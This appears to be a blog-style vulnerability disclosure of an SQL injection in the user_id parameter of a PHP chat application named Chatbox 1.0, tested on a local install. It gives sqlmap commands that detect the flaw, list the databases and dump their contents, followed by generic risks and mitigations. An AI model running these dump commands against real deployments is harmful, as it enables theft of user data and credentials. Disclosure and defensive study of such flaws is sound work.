Hi All,
I am Maloy Roy Orko.
CVE Number: In Review
CWE: 89
Recently in one of my pentest research, I found an chat application which is built using PHP and JavaScript By shafhasan.
Curious to explore its functionalities, I downloaded and set it up in my local system.
After fiddling with the source code, I found that it did not have any kind of SQL Injection protection.
It can lead into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.
The Main Thing Is : If any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too.That's why, I am trying to inform everyone about this.
Title of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko
Vulnerability Class: SQL Injection
Product Name: Chatbox 1.0
Vendor: https://github.com/shafhasan/
Vulnerable Product Link:
https://github.com/shafhasan/chatbox
Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.
Product & Service Introduction: Chatbox 1.0 using JavaScript and PHP
Observation & Exploitation:
So Lets See ,How I exploited It? What is the exploitable parameter here?
That is: chat.php?user_id=
Lets Take a example and then see the exploit use here!
Vulnerable Place :
http://192.168.0.103:8080/chat/chat.php?user_id=1268013315
So,Lets see an approach and the result?
First we will, try to get that it is SQL INJECTION or not then we will determine its type and then see the exploitation!
So,I used sqlmap:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4
As you can see,It is vulnerable to SQL Injection
So,I tried automation!
I used SQLMAP to exploit and get all databases!
Command:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs
Result:
As you can see,All database has been dumped!
Let's do data explosure:
My Exploit For This Information Discolsure:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump
Guess What ?
It is clearly a SQL Injection Vulnerability
Risks of SQL Injection:
Data Breach: Attackers can gain unauthorized access to sensitive data, including personal information, financial records, and confidential business information.
Data Manipulation: Attackers can modify, delete, or insert data into the database, leading to data integrity issues and loss of critical information.
Authentication Bypass: SQL injection can allow attackers to bypass authentication mechanisms, gaining unauthorized access to user accounts or administrative functions.
Remote Code Execution: In some cases, SQL injection can lead to the execution of arbitrary code on the server, allowing attackers to take control of the server.
Denial of Service (DoS): Attackers can exploit SQL injection to execute heavy queries that can slow down or crash the database.
Privilege Escalation: Attackers can exploit SQL injection to gain higher privileges than intended, allowing them to perform actions that should be restricted.
Data Exfiltration: Attackers can extract large volumes of data from the database, which can be used for identity theft, fraud, or sold on the dark web.
Reputation Damage: Organizations that suffer from SQL injection attacks may face reputational damage, loss of customer trust, and potential legal consequences.
Impacts of SQL Injection:
Financial Loss: The costs associated with a data breach can be significant, including legal fees, regulatory fines, and costs related to remediation and recovery.
Legal Consequences: Organizations may face lawsuits or regulatory penalties for failing to protect sensitive data, especially if they are subject to data protection regulations (e.g., GDPR, HIPAA).
Operational Disruption: A successful SQL injection attack can disrupt business operations, leading to downtime and loss of productivity.
Loss of Intellectual Property: Attackers may gain access to proprietary information, trade secrets, or other intellectual property, which can be detrimental to a business's competitive advantage.
Increased Security Costs: Organizations may need to invest in enhanced security measures, such as application firewalls, security audits, and employee training, to prevent future attacks.
Customer Trust Erosion: Customers may lose trust in an organization that has experienced a data breach, leading to decreased customer loyalty and potential loss of business.
Mitigation Strategies:
To mitigate the risks associated with SQL injection, organizations should implement the following strategies:
Parameterized Queries: Use prepared statements and parameterized queries to ensure that user input is treated as data, not executable code.
Input Validation: Validate and sanitize all user inputs to ensure they conform to expected formats and types.
Least Privilege Principle: Limit database user permissions to the minimum necessary for application functionality.
Web Application Firewalls (WAF): Deploy WAFs to help detect and block SQL injection attempts.
Regular Security Audits: Conduct regular security assessments and code reviews to identify and remediate vulnerabilities.
Security Awareness Training: Educate developers and staff about secure coding practices and the risks associated with SQL injection.
Conclusion :-
The main aim of this article is to show that if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent.